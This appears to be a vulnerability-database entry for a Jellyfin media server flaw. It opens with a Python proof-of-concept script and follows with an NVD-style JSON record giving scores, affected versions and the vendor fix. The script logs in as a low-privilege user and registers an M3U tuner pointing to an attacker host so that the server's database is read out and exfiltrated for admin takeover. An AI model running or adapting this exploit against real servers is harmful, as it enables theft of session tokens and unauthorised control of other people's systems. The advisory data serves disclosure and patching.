CVE-2026-35032

import requests # Exploit Concept for CVE-2026-35032 # Attacker controlled server URL attacker_server = "http://attacker-controlled.com" # Target Jellyfin Instance target_url = "http://jellyfin-target:8096" username = "low_priv_user" password = "password" # 1. Authenticate and get API Key session = requests.Session() auth_payload = {"Username": username, "Pw": password} auth_resp = session.post(f"{target_url}/Users/authenticatebyname", json=auth_payload) access_token = auth_resp.json().get('AccessToken') headers = {"X-Emby-Authorization": f"MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="xxx", Version="10.11.0", Token="{access_token}""} # 2. Add Malicious M3U Tuner pointing to attacker server # The attacker server serves an M3U containing a reference to the local DB (e.g., file:///config/data/jellyfin.db) tuner_payload = { "Type": "m3u", "Url": f"{attacker_server}/malicious_playlist.m3u", "FriendlyName": "Exploit Tuner" } add_tuner = session.post(f"{target_url}/LiveTv/TunerHosts", json=tuner_payload, headers=headers) print(f"Added tuner status: {add_tuner.status_code}") # 3. Trigger Refresh/Scan to force Jellyfin to parse the M3U and read the local file # The file content (DB) will be sent back to the attacker server via the URL specified in the M3U or logged in traffic depending on the specific SSRF implementation details. print("Check attacker server logs for exfiltrated database content.")

{"cve": {"id": "CVE-2026-35032", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:28.660", "lastModified": "2026-04-23T14:03:09.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jellyfin is an open source self hosted media server. Versions prior to 10.11.7 contain a vulnerability chain in the LiveTV M3U tuner endpoint (POST /LiveTv/TunerHosts), where the tuner URL is not validated, allowing local file read via non-HTTP paths and Server-Side Request Forgery (SSRF) via HTTP URLs. This is exploitable by any authenticated user because the EnableLiveTvManagement permission defaults to true for all new users. An attacker can chain these vulnerabilities by adding an M3U tuner pointing to an attacker-controlled server, serving a crafted M3U with a channel pointing to the Jellyfin database, exfiltrating the database to extract admin session tokens, and escalating to admin privileges. This issue has been fixed in version 10.11.7. If users are unable to upgrade immediately, they can disable Live TV Management privileges for all users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.11.7", "matchCriteriaId": "16256CB1-CEA1-4216-B492-D9016420F60D"}]}]}], "references": [{"url": "https://github.com/jellyfin/jellyfin/releases/tag/v10.11.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/jellyfin/jellyfin/security/advisories/GHSA-8fw7-f233-ffr8", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}